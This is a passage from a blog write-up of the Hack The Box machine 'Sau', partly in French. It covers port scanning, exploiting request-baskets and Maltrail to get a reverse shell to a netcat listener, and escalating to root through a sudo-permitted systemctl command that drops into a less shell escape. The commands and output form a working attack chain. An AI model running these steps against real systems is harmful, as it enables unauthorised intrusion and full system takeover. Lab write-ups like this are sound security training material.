(ECDSA) |_ 256 b3:0c:47:fb:a2:f2:12:cc:ce:0b:58:82:0e:50:43:36 (ED25519) 80/tcp filtered http 55555/tcp open unknown | fingerprint-strings: | FourOhFourRequest: | HTTP/1.0 400 Bad Request | Content-Type: text/plain; charset=utf-8 | X-Content-Type-Options: nosniff | Date: Wed, 27 Dec 2023 23:03:42 GMT | Content-Length: 75 | invalid basket name; the name does not match pattern: ^[wd-_\\.]{1,250}$ | GenericLines, Help, Kerberos, LDAPSearchReq, LPDString, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie: | HTTP/1.1 400 Bad Request | Content-Type: text/plain; charset=utf-8 | Connection: close | Request | GetRequest: | HTTP/1.0 302 Found | Content-Type: text/html; charset=utf-8 | Location: /web | Date: Wed, 27 Dec 2023 23:03:16 GMT | Content-Length: 27 | href=\u0026#34;/web\u0026#34;\u0026gt;Found\u0026lt;/a\u0026gt;. | HTTPOptions: | HTTP/1.0 200 OK | Allow: GET, OPTIONS | Date: Wed, 27 Dec 2023 23:03:16 GMT |_ Content-Length: 0 Foothold Exploitation request-baskets 1 I found a CVE online and I exploit it Exploitation Maltrail 1 2 3 ┌──(kali㉿kali)-[~/HTB/Sau/maltrail-exploit/Maltrail-v0.53-Exploit] └─$ python3 exploit.py 10.10.14.160 55555 http://10.10.11.224:55555/pleffy Running exploit on http://10.10.11.224:55555/pleffy/login Reverse Shell Open reverse shell. Listening with nc at the same time we launch the exploit.py\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 ┌──(kali㉿kali)-[~] └─$ sudo nc -lvp 55555 [sudo] Mot de passe de kali : listening on [any] 55555 ... 10.10.11.224: inverse host lookup failed: Unknown host connect to [10.10.14.160] from (UNKNOWN) [10.10.11.224] 50528 $ ls ls CHANGELOG core maltrail-sensor.service plugins thirdparty CITATION.cff docker maltrail-server.service requirements.txt trails LICENSE h maltrail.conf sensor.py README.md html misc server.py $ whoami whoami puma Open python bash 1 2 3 4 5 $ python3 -c \u0026#39;import pty;pty.spawn(\u0026#34;/bin/bash\u0026#34;)\u0026#39; python3 -c \u0026#39;import pty;pty.spawn(\u0026#34;/bin/bash\u0026#34;)\u0026#39; puma@sau:~$ whoami whoami puma User flag 1 2 3 4 5 6 puma@sau:~$ ls ls linpeas.sh systemctl u user.txt puma@sau:~$ cat user* cat user* d302.....b9f0 Privilege Escalation Enumeration 1 2 3 4 5 6 7 8 $ sudo -l sudo -l Matching Defaults entries for puma on sau: env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin User puma may run the following commands on sau: (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service On peut voir qu\u0026rsquo;il peut executer cette commande en tant qu\u0026rsquo;administrateur :\n1 sudo /usr/bin/systemctl status trail.service systemctl status trail.service Lorsqu\u0026rsquo;on l\u0026rsquo;execute, on observe que la commande utilise less. Or, si less est executé en tant qu\u0026rsquo;administrateur, on peut lancer un shell en tant que root. J\u0026rsquo;ai pu trouver cette information en cherchant sur ce site :\nhttps://gtfobins.github.io/gtfobins/less/\nPar exemple, on peut écrire: !/bin/sh\nLorsque less est executé en tant qu\u0026rsquo;admin, ça doit lancer un shell en tant que root\nExploit : less 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 $ sudo /usr/bin/systemctl status trail.service sudo /usr/bin/systemctl status trail.service WARNING: terminal is not fully functional - (press RETURN)!/bin/sh !//bbiinn//sshh!/bin/sh # whoami whoami root # cd /root cd /root # ls ls go root.txt # cat roo* cat roo* 047d.....6de3 ","date":"2023-12-28T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/sau-htb/","title":"HTB | Sau"}]